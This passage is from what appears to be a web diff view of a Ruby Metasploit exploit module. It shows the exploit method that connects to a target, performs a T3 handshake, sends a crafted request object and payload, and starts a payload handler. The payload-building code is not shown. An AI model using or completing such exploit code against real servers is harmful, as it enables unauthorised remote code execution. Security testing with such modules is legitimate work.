|
||||||
|
sleep(1)
|
||||||
|
sock.get_once
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
connect
|
||||||
|
|
||||||
|
print_status('Sending handshake...')
|
||||||
|
t3_handshake
|
||||||
|
|
||||||
|
print_status('Sending T3 request object...')
|
||||||
|
build_t3_request_object
|
||||||
|
|
||||||
|
print_status('Sending client object payload...')
|
||||||
|
send_payload_objdata
|
||||||
|
|
||||||
|
handler
|
||||||
|
disconnect
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue